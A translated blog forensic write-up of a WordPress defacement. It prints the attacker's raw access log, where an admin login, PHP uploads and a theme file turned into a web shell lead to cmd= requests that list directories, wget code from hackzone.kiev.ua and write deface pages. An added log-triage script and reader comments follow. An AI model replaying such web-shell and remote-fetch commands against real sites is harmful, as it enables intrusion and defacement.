Apologies in advance for the delay in posting part 2 of "antihackerlink was hacked" on this blog; real life got busy :). OK, straight to it: this time the forensic analysis is done from the raw access log of the antihackerlink server. We are deliberately providing only that access log here. Feel free to analyse it together here :).
88.237.213.52 - - [04/Dec/2008:04:52:28 +0700] "GET / HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:04:53:21 +0700] "GET /?page_id=2 HTTP/1.1" 200 12535
88.237.213.52 - - [04/Dec/2008:04:54:23 +0700] "GET / HTTP/1.1" <- "http://www.google.com/search?client=opera&rls=tr&q=antihackerlink.or.id&sourceid=opera&ie=utf-8&oe=utf-8"
88.237.213.52 - - [04/Dec/2008:05:01:50 +0700] "GET /wp-login.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:01:58 +0700] "POST /wp-login.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:01:59 +0700] "GET /wp-admin/ HTTP/1.1" <- "http://antihackerlink.or.id/wp-login.php"
88.237.213.52 - - [04/Dec/2008:05:02:06 +0700] "GET /wp-admin/edit.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:02:10 +0700] "GET /wp-admin/post.php?action=edit&post=34 HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:02:51 +0700] "GET /wp-admin/media-upload.php?post_id=34&type=image& HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:03:00 +0700] "POST /wp-admin/async-upload.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:03:05 +0700] "POST /wp-admin/async-upload.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:03:26 +0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" <- "http://antihackerlink.or.id/wp-admin/post.php?action=edit&post=34"
88.237.213.52 - - [04/Dec/2008:05:03:26 +0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" <- "http://antihackerlink.or.id/wp-admin/post.php?action=edit&post=34"
88.237.213.52 - - [04/Dec/2008:05:03:35 +0700] "GET /wp-content/uploads/2008/12/405.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:03:39 +0700] "GET /wp-content/uploads/2008/12/405.php/ HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:04:31 +0700] "GET /wp-admin/media-upload.php?post_id=34&type=image& HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:04:44 +0700] "POST /wp-admin/media-upload.php?type=image&tab=type&post_id=34 HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:05:18 +0700] "GET /wp-content/uploads/2008/12/403.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:05:20 +0700] "GET /wp-content/uploads/2008/12/403.php/ HTTP/1.1"
….. ……
….. ……
….. ……
….. ……
88.237.213.52 - - [04/Dec/2008:05:05:50 +0700] "GET /wp-admin/theme-editor.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:06:04 +0700] "GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:06:39 +0700] "POST /wp-admin/theme-editor.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:06:50 +0700] "GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:07:18 +0700] "POST /wp-admin/theme-editor.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:07:42 +0700] "GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:09:56 +0700] "POST /wp-admin/theme-editor.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:10:08 +0700] "GET /wp-content/themes/illacrimo/footer.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:11:52 +0700] "POST /wp-admin/theme-editor.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:11:53 +0700] "GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:11:58 +0700] "GET //wp-content/themes/illacrimo/footer.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:12:00 +0700] "GET //wp-content/themes/illacrimo/footer.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:12:05 +0700] "GET //wp-content/themes/illacrimo/
88.237.213.52 - - [04/Dec/2008:05:12:08 +0700] "GET //wp-content/themes/illacrimo/v4.php
88.237.213.52 - - [04/Dec/2008:05:12:09 +0700] "GET //wp-content/themes/illacrimo/v4.php
88.237.213.52 - - [04/Dec/2008:05:12:15 +0700] "GET //wp-content/themes/illacrimo/v454.php
—————-
88.237.213.52 - - [04/Dec/2008:05:12:54 +0700] "GET //wp-content/themes/illacrimo/footer.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:13:04 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=ls HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:13:08 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:13:45 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://hackzone.kiev.ua/403.txt;mv%20403.txt%20z.php;ls%20-lia HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:14:02 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://hackzone.kiev.ua/403.txt;ls%20-lia HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:14:28 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://0d4y.org;ls%20-lia HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:15:13 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=pwd HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:15:26 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia%20/home/sakitjiw/public_html/antihackerlink.or.id/ HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:15:49 +0700] "GET /v4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:18:59 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20'hacked%20ogi%20'%3Ev4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:19:05 +0700] "GET /v4.php
88.237.213.52 - - [04/Dec/2008:05:20:18 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20x%20%3Ev4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:20:21 +0700] "GET /v4.php
88.237.213.52 - - [04/Dec/2008:05:24:27 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20%3Ccenter%3E%3Ch2%3E%20%20Hacked%20%3Cbr%3E%20%20By_Ogmass%20&%20S4S_7%3Cbr%3E%20%20Got%20RooT%20?%3Cbr%3E%20%20uid=0(ogis4s)%20gid=0(ogis4s)%20groups=0(ogis4s)%3Cbr%3E%20%20Linux%20aquarius.romantis.net%202.6.9-023stab044.11-enterprise HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:24:36 +0700] "GET /v4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:25:19 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo'%3Ccenter%3E%3Ch2%3E%20%20Hacked%20%3Cbr%3E%20%20By_Ogmass%20&%20S4S_7%3Cbr%3E%20%20Got%20RooT%20?%3Cbr%3E%20%20uid=0(ogis4s)%20gid=0(ogis4s)%20groups=0(ogis4s)%3Cbr%3E%20%20Linux%20aquarius.romantis.net%202.6.9-023stab044.11-enterprise HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:25:22 +0700] "GET /v4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:26:59 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo'Hacked%20By_Ogmass%20&%20S4S_7'%3Ev4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:27:01 +0700] "GET /v4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:27:27 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20'%20Hacked%20By_Ogmass%20&%20S4S_7%20'%20%3Ev4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:27:41 +0700] "GET / HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:28:17 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/; HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:28:45 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:28:49 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:28:51 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:28:59 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua HTTP/
88.237.213.52 - - [04/Dec/2008:05:29:03 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd= HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:29:08 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=pwd HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:29:53 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/wp-content/themes/;ls%20-lia HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:30:48 +0700] "GET /wp-admin/post-new.php HTTP/1.1"
………………………
88.237.213.52 - - [04/Dec/2008:06:46:38 +0700] "GET / HTTP/1.1" 2286 "http://www.zone-h.org/component/option,com_attacks/Itemid,45/filter_defacer,By_Ogmass/"
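To make a log like the one above quicker to triage, here is an added example (not part of the original post) that parses lines in the same simplified format and flags the three patterns the log shows: admin POSTs to endpoints that write files into the web root (async-upload.php, theme-editor.php), PHP files requested under wp-content/uploads, and a cmd= query parameter, whose value is URL-decoded for the timeline. The sample lines are constructed from the log above, with the home path shortened to /home/x/.

```python
import re
from urllib.parse import unquote

# Constructed sample, abridged from the post's log (home path shortened to /home/x/).
SAMPLE_LOG = """\
88.237.213.52 - - [04/Dec/2008:05:01:58 +0700] "POST /wp-login.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:03:00 +0700] "POST /wp-admin/async-upload.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:03:35 +0700] "GET /wp-content/uploads/2008/12/405.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:06:39 +0700] "POST /wp-admin/theme-editor.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:13:04 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=ls HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:15:26 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia%20/home/x/ HTTP/1.1"
"""

# ip ident user [timestamp] "METHOD target PROTOCOL" ... ; status, size and
# referer are optional because the post's log carries them only sometimes.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*"')

# WordPress admin endpoints whose POST handlers write files under the web root.
FILE_WRITING_POSTS = {"/wp-admin/async-upload.php", "/wp-admin/theme-editor.php"}


def parse(line):
    """Split one access-log line into its fields; None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, target = m.groups()
    path, _, query = target.partition("?")
    # "GET //wp-content/..." and "GET /wp-content/..." name the same resource.
    return {"ip": ip, "ts": ts, "method": method,
            "path": re.sub(r"/+", "/", path), "query": query}


def findings(log_text):
    """Return (timestamp, rule, detail) for every line that matches one of the
    three indicators visible in the post's log, in log order."""
    out = []
    for line in log_text.splitlines():
        r = parse(line)
        if r is None:
            continue
        if r["method"] == "POST" and r["path"] in FILE_WRITING_POSTS:
            out.append((r["ts"], "admin-file-write", r["path"]))
        if r["path"].startswith("/wp-content/uploads/") and r["path"].endswith(".php"):
            out.append((r["ts"], "php-under-uploads", r["path"]))
        if "cmd=" in r["query"]:
            # Decode %20 etc. so the timeline shows the command as it was typed.
            out.append((r["ts"], "cmd-parameter", unquote(r["query"].split("cmd=", 1)[1])))
    return out


if __name__ == "__main__":
    for ts, rule, detail in findings(SAMPLE_LOG):
        print(f"{ts}  {rule:18} {detail}")
```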
aw aw aw aw..
just make your own WP theme, hehehe
brb, running off.. gotta fix mine too, who knows, it might be possible like that
after reading it several times I still don't get what it means
Whoa, what's the point, bro fl3xu5… heheheh.. :D
88.237.213.52 - - [04/Dec/2008:05:27:27 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20'%20Hacked%20By_Ogmass%20&%20S4S_7%20'%20%3Ev4.php HTTP/1.1"
After reading it over and over, they really had antihackerlink as their deface target from the start; you can see above how they looked at and tried to get into every file / folder, using a hacking technique different from what other people usually do. So in my opinion, they (the Turkish defacers) didn't focus only on public exploits; they used an alternative method that is rarely used anymore 🙂 Cool of them. Thanks for Part II Antihackerlink, bro fl3xu5
indeed..
the suspect looks confused..
going into the directories one by one..
hats off to the suspect, haha..
running off....
hohoohoh…
sakitjiwa is Arif, right…
hahaha.. what was he doing?
wooh…
cool….
=========
running off…
@sakitjiwa : 🙂
Bro…..
was antihackerlink's WP not updated??
Oh yeah, did they grab the exploit from http://hackzone.kiev.ua/403.txt;mv%20403.txt%20z.php;ls%20-lia ??
Damn, WP got swallowed too…
Mind if I copy this to study it, bro
Just as I had predicted xD~
hehehe, how come he went straight to footer.php….
well, in my opinion…..
read it at http://rindho.com/?sub=view&id=9&kategori=forensic%20antihackerlink.or.id%20part%20II
😀
sorry bro, I don't get it
hehe
wp, wp, mine isn't updated either, hehehe
@rindho
coooool, thx
thanks to sakitjiwa n JinX 🙂
addition: http://www.milw0rm.com/exploits/6421
Regards,
fl3xu5
woala..
how come the vuln got into Google?
security experts really have to be sharp.. to that extent..
If I were told to read a log like that, wow.. have mercy. I'm too lazy even to read my own program's logs.. :p
Wow, so he got into wp, then edited the footer to create his own bug, i.e. wrote his own RFI code. Then he opened the folders one by one, is that it, bro
This is just a simple comment, since I haven't looked into it further.
I'm going to run off now.
—————————————>> running off